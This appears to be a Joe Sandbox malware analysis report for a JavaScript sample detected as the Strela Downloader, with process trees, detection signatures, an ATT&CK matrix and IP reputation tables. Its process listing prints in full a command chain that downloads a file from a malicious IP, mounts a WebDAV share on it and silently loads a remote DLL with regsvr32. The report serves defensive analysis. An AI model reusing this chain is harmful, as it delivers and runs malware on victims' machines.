Windows
Analysis Report
19597294421812213615.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6252 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\19597 2944218122 13615.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 3292 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\229 0426923210 85.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1784 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7116 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 4304 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7108 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7204 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=22 80 --field -trial-han dle=1544,i ,746406294 3782459631 ,116583884 0744822040 4,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 1516 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588258 |
Start date and time: | 2025-01-10 23:08:53 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 6s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 15 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 19597294421812213615.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@28/62@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 184.28.88.176, 52.22.41.97, 52.6.155.20, 3.233.129.217, 3.219.243.226, 162.159.61.3, 172.64.41.3, 2.23.242.162, 88.221.110.91, 2.16.100.168, 23.209.209.135, 2.16.168.107, 2.16.168.105, 23.40.179.31, 23.40.179.27, 23.40.179.26, 23.40.179.35, 23.40.179.19, 23.40.179.15, 23.40.179.21, 23.40.179.33, 23.40.179.22, 192.168.2.5, 13.107.246.45, 172.202.163.200, 23.206.252.175
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, geo2.adobe.com
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
17:09:51 | API Interceptor | |
17:09:56 | API Interceptor | |
17:09:57 | API Interceptor | |
17:10:09 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.8307238749513095 |
Encrypted: | false |
SSDEEP: | 1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug2:gJjJGtpTq2yv1AuNZRY3diu8iBVqFs |
MD5: | 1201589639145EBF389C622EA5076C87 |
SHA1: | B3FF46294A2D036F2BD5538A405D56DF3B8CAD92 |
SHA-256: | B980D6310EB6D67AB1A0F7CBB93F42E49D0FB68DF8AE2DB344A6B38B8CE65870 |
SHA-512: | 849D7D5C9BEF7A5FB848CC9E0CEDE2A66CB4CA4231286CF7C14C2F61088B6285DE282D3D7ECE2478640D72DBD39C8336F1542797F7EC8118768AE22111DEDBA4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.6585607214888302 |
Encrypted: | false |
SSDEEP: | 1536:RSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Raza9v5hYe92UOHDnAPZ4PZf9h/9h |
MD5: | 74A9D4D88CB165095ED0A675AD895836 |
SHA1: | 1DBDC09B621510ABC9643199CFC9B42C290BD808 |
SHA-256: | 1BE53484EE751D7DC20DAEF637C033C530F210FAC310A8D054306729DE18E234 |
SHA-512: | D736A86D2D15BE3F1A9E3044543A5D207E2FC2E80566461A32A395AFC0559BD347AC0AA72B1533B0A74D3D4BF146FBF32BAA88B259BFF0ACC9B842CC79CED185 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08067019755441357 |
Encrypted: | false |
SSDEEP: | 3:Cll/lKYerSvlu1vtGuAJkhvekl1wlYllrekGltll/SPj:S/lKzr5trxlCeJe3l |
